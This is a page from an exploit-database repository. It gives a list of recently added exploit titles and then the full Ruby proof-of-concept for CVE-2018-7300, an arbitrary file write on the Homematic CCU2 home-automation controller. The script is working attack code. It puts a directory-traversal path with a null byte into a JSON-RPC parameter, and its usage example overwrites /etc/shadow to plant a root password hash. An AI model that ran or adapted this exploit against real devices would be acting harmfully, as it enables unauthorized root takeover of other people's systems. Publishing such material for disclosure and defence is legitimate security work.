a13c4ea572
23 changes to exploits/shellcodes SysGauge 4.5.18 - Local Denial of Service Systematic SitAware - NVG Denial of Service Allok AVI DivX MPEG to DVD Converter 2.6.1217 - Buffer Overflow (SEH) Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow osTicket 1.10 - SQL Injection osTicket 1.10 - SQL Injection (PoC) Open-AuditIT Professional 2.1 - Cross-Site Request Forgery Homematic CCU2 2.29.23 - Arbitrary File Write MiniCMS 1.10 - Cross-Site Request Forgery WordPress Plugin Relevanssi 4.0.4 - Reflected Cross-Site Scripting WordPress Plugin Contact Form 7 to Database Extension 2.10.32 - CSV Injection Homematic CCU2 2.29.23 - Remote Command Execution Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection Joomla! Component AcySMS 3.5.0 - CSV Macro Injection WordPress Plugin WP Security Audit Log 3.1.1 - Sensitive Information Disclosure Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change osCommerce 2.3.4.1 - Remote Code Execution Tenda W316R Wireless Router 5.07.50 - Remote DNS Change D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit) Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)
81 lines
No EOL
2.3 KiB
Ruby
Executable file
81 lines
No EOL
2.3 KiB
Ruby
Executable file
#!/usr/bin/ruby
|
|
|
|
# Exploit Title: Homematic CCU2 Arbitrary File Write
|
|
# Date: 28-03-18
|
|
# Exploit Author: Patrick Muench, Gregor Kopf
|
|
# Vendor Homepage: http://www.eq-3.de
|
|
# Software Link: http://www.eq-3.de/service/downloads.html?id=268
|
|
# Version: 2.29.23
|
|
# CVE : 2018-7300
|
|
|
|
# Description: http://atomic111.github.io/article/homematic-ccu2-filewrite
|
|
|
|
require 'net/http'
|
|
require 'net/https'
|
|
require 'uri'
|
|
require 'json'
|
|
|
|
unless ARGV.length == 3
|
|
STDOUT.puts <<-EOF
|
|
Please provide url
|
|
|
|
Usage:
|
|
write_files.rb <ip.adress> <file path> <content of the file>
|
|
|
|
Example:
|
|
write_files.rb https://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
|
|
|
|
or
|
|
|
|
write_files.rb http://192.168.1.1 '/etc/shadow' 'root:$1$DsoAgNYx$BSSQ9cLv0DLLknpqztgdd/:19087:0:99999:7:::'
|
|
|
|
EOF
|
|
exit
|
|
end
|
|
|
|
# The first argument specifiee the URL and if http or https is used
|
|
url = ARGV[0] + "/api/homematic.cgi"
|
|
|
|
# The second argument specifies the file into which the content should be written
|
|
homematic_file_path = ARGV[1]
|
|
|
|
# The third argument specifies the content of the file
|
|
homematic_file_content = ARGV[2]
|
|
|
|
# define the json body for the attack
|
|
body = {
|
|
"version": "1.1",
|
|
"method": "User.setLanguage",
|
|
"params": {
|
|
"userName": "file path",
|
|
"userLang": "file content"
|
|
}
|
|
}.to_hash
|
|
|
|
# define the traversal with the file you want to write
|
|
body[:params][:userName] = "../../../../../../../.." + homematic_file_path + "\u0000"
|
|
|
|
# define the content
|
|
body[:params][:userLang] = homematic_file_content
|
|
|
|
# split the uri to access it in a easier way
|
|
uri = URI.parse(url)
|
|
|
|
# define target connection, disabling certificate verification
|
|
Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
|
|
|
|
# define post request
|
|
request = Net::HTTP::Post.new(uri.request_uri)
|
|
|
|
# define the content type of the http request
|
|
request.content_type = 'application/json'
|
|
|
|
# define the request body
|
|
request.body = body.to_json
|
|
|
|
# send the request to the homematic ccu2
|
|
response = http.request(request)
|
|
|
|
# print response message code and status to cli
|
|
puts 'Response code: ' + response.code + ' ' + response.message
|
|
end |